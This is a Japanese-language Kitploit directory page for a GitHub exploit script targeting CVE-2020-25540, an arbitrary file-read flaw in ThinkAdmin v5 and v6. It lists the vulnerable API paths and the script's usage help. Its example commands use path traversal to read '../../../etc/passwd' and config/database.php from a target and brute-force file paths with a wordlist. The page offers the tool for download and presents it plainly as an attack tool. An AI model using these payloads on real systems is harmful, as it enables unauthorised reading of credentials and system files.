Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 任意ファイル読み取り脆弱性の悪用、カスタマイズ可能な辞書ブルートフォース攻撃 | Kitploit
ツール/GitHubGitHub/simonlee-hello/cve-2020-25540
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 任意ファイル読み取り脆弱性の悪用、カスタマイズ可能な辞書ブルートフォース攻撃

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

cve-2020-25540

このスクリプトは、ThinkAdmin v5、v6 バージョンに対して任意ファイル読み取りの脆弱性を悪用するためのものです

==インターフェースのパスはバージョンによって異なる場合があります(オリジナルのThinkAdminをベースに二次開発されたものもあります)==

  • オリジナル版のインターフェース:/admin.html?s=admin/api.Update/get?/encode/xxxx
  • このバージョン(某マネーゲーム系プラットフォームの二次開発版):/admin.html?s=admin/api.Update/read?encode=xxxx

基本的な使い方

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
ツールをダウンロード